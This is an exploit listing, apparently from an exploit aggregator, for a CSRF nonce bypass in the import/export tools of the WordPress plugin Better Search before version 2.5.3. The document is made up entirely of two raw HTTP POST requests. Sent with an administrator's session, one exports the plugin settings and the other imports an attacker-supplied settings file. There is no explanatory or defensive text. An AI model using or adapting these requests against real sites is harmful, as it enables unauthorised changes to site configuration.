Exploit for Better Search < 2.5.3 - CSRF Nonce Bypass in Import/Export

## https://sploitus.com/exploit?id=WPEX-ID:53F9482C-D2E7-4AE9-B57D-45F825282715
POST /wp-admin/admin.php?page=bsearch_tools_page HTTP/1.1
Host: example.com
User-Agent: YOLO
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/admin.php?page=bsearch_tools_page
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Origin: https://example.com
Connection: close
Cookie: [admin cookies]
Upgrade-Insecure-Requests: 1

bsearch_action=export_settings&bsearch_export_settings=Export+Settings


POST /wp-admin/admin.php?page=bsearch_tools_page HTTP/1.1
Host: example.com
User-Agent: YOLO
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/wp-admin/admin.php?page=bsearch_tools_page
Content-Type: multipart/form-data; boundary=---------------------------16367323269315448902578822082
Content-Length: 536
Origin: http://example.com
Connection: close
Cookie: [admin cookies]
Upgrade-Insecure-Requests: 1

-----------------------------16367323269315448902578822082
Content-Disposition: form-data; name="import_settings_file"; filename="settings.json"
Content-Type: application/json

{"seamless":0}
-----------------------------16367323269315448902578822082
Content-Disposition: form-data; name="bsearch_import_settings"

Import Settings
-----------------------------16367323269315448902578822082
Content-Disposition: form-data; name="bsearch_action"

import_settings
-----------------------------16367323269315448902578822082--